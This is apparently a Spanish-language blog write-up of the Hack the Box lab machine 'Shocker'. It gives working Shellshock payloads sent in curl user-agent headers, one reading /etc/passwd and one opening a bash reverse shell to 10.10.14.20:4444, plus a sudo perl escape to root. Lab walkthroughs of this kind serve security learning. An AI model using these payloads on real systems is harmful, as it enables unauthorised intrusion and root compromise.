domingo, 14 de junio de 2020

Machine:Shocker

SHOCKER


Plataforma: Hack the Box
OS: Linux
Machine: Shocker
Dirección IP: 10.10.10.56

Reconocimiento:

Comandos:

nmap -sC -sV 10.10.10.56



Aplicación Web:


Se realizó un crawler al sitio con el script dirsearch.py, encontramos el directorio cgi-bin:

Comandos:

python3 dirsearch.py -u http://10.10.10.56 -E -t 50

Realizamos un crawler al directorio cgi-bin, con la finalidad de encontrar scripts sh, py, pl, cgi:

Comandos:

python3 dirsearch.py -u http://10.10.10.56/cgi-bin/ -e "sh,py,pl,cgi" -t 50

Script encontrado:

user.sh


Explotación


Comprobamos que el script user.sh es vulnerable a Shellshock, con el siguiente script:

Link del Script: https://github.com/opsxcq/exploit-CVE-2014-6271

Script:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://10.10.10.56/cgi-bin/user.sh

Obtendremos una shell con el siguiente script dejando un puerto en escucha:

Script:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.20/4444 0>&1'" http://10.10.10.56/cgi-bin/user.sh

Comandos:

nc -lvnp 444

Obtenemos la bandera de usuario:


Elevación de Privilegios


Ejecutamos los siguientes comandos, el primero para enumerar la lista de comandos que pueden ejecutarse como root y posteriormente con el segundo comando obtenemos una shell como root:

Comando:

sudo -l

sudo /usr/bin/perl -e 'exec "/bin/sh"'

Finalmente obtenemos la bandera de root:

Etiquetas: , ,

0 comentarios:

Publicar un comentario

Suscribirse a Enviar comentarios [Atom]

<< Inicio